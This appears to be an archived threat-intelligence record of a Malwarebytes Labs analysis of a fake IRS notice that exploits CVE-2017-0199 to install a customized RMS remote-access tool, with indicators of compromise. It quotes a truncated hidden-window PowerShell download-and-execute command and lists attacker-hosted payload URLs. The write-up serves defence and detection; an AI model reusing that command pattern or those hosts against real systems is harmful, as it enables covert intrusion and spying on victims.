{
	"id": "7e772dda-e85a-402e-bcbd-9206cf23cf82",
	"created_at": "2026-04-06T00:08:00.236309Z",
	"updated_at": "2026-04-10T03:21:18.363697Z",
	"deleted_at": null,
	"sha1_hash": "e30dcdd5d84456b4d00a76fdcbbbe1855042b027",
	"title": "Fake IRS notice delivers customized spying tool | Malwarebytes Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 364980,
	"plain_text": "Fake IRS notice delivers customized spying tool | Malwarebytes\r\nLabs\r\nBy Jérôme Segura\r\nPublished: 2017-09-20 · Archived: 2026-04-05 13:04:52 UTC\r\nWhile macro-based documents and scripts make up for the majority of malspam attacks these days, we also see\r\nsome campaigns that leverage documents embedded with exploits. Case in point, we came across a malicious\r\nMicrosoft Office file disguised as a CP2000 notice. The Internal Revenue Service (IRS) usually mails out this\r\nletter to taxpayers when information is incorrectly reported on a previous return.\r\nVictims that fall for the scam will infect themselves with a custom Remote Administration Tool. A RAT can be\r\nutilized for legitimate purposes, for example by a system administrator, but it can also be used without a user’s\r\nconsent or knowledge to remotely control their machine, view and delete files or deploy a keylogger to silently\r\ncapture keystrokes.\r\nIn this blog post, we will review this exploit’s delivery mechanism and take a look at the remote tool it deploys.\r\nDistribution\r\nThe malicious document is hosted on a remote server and users are most likely enticed to open it via a link from a\r\nphishing email. The file contains an OLE2 embedded link object which retrieves a malicious HTA script from a\r\nremote server and executes it. In turn, it downloads the final payload, all with very little user interaction required\r\nsince it is using CVE-2017-0199, first uncovered in April 2017 as a zero-day.\r\n82.211.30[.]108/css/CP2000IRS.doc\r\n \r\nhttps://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/\r\nPage 1 of 6\n\nThe embedded link points to an HTA script hosted under an unexpected location – a Norwegian\r\ncompany’s compromised FTP server – which invokes PowerShell to download and execute the actual malware\r\npayload.\r\nftp://lindrupmartinsen[.]no:21/httpdocs/test/template.hta\r\n \"C:WindowsSystem32WindowsPowerShellv1.0powershell.exe\" -WindowStyle Hidden (New-Object System.Net\r\nPayload\r\nThe downloaded payload (intelgfx.exe) extracts to several components into a local folder and achieves persistence\r\nusing a decoy shortcut. The VBS scripts ensure that the main module runs without showing its GUI, in order to\r\nremain invisible to the victim.\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/\r\nPage 2 of 6\n\nRMS agent stands for Remote Manipulator System and is a remote control application made by a Russian\r\ncompany. It appears that in this case, the attackers took the original program (as pictured below) and slightly\r\ncustomized it, not to mention the fact that they are using it for nefarious purposes, namely spying on their victims.\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/\r\nPage 3 of 6\n\nIts source code shows the debugging path information and name that they gave to the module.\r\nOffice exploits and RATs\r\nThis is not the first time that CVE-2017-0199 is used to distribute a RAT. Last August, TrendMicro described an\r\nattack where the same exploit was adapted for PowerPoint and used to deliver the REMCOS RAT. It also shows\r\nthat threat actors often repackage existing toolkits – which can be legitimate – and turn them into full-fledged\r\nspying applications.\r\nWe reported the compromised FTP server to its owner. Malwarebytes users were already protected against CVE-2017-0199 as well as its payload which is detected as Backdoor.Bot.\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/\r\nPage 4 of 6\n\nThanks to @hasherezade for help with payload analysis.\r\nIndicators of compromise\r\nWord doc CVE-2017-0199\r\n82.211.30[.]108/css/CP2000IRS.doc 47ee31f74b6063fab028111e2be6b3c2ddab91d48a98523982e845f9356979c1\r\nHTA script\r\nftp://lindrupmartinsen[.]no:21/httpdocs/test/template.hta d01b6d9507429df065b9b823e763a043aa38b722419\r\nMain package (intelgfx.exe)\r\n82.211.30[.]108/css/intelgfx.exe 924aa03c953201f303e47ddc4825b86abb142edb6c5f82f53205b6c0c61d82c8\r\nRAT module\r\n4d0e5ebb4d64adc651608ff4ce335e86631b0d93392fe1e701007ae6187b7186\r\nOther IOCs from same distribution server\r\n82.211.30[.]108/estate.xml 82.211.30[.]108/css/qbks.exe\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/\r\nPage 5 of 6\n\nSource: https://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/"
	],
	"report_names": [
		"cve-2017-0199-used-to-deliver-modified-rms-agent-rat"
	],
	"threat_actors": [],
	"ts_created_at": 1775434080,
	"ts_updated_at": 1775791278,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e30dcdd5d84456b4d00a76fdcbbbe1855042b027.pdf",
		"text": "https://archive.orkl.eu/e30dcdd5d84456b4d00a76fdcbbbe1855042b027.txt",
		"img": "https://archive.orkl.eu/e30dcdd5d84456b4d00a76fdcbbbe1855042b027.jpg"
	}
}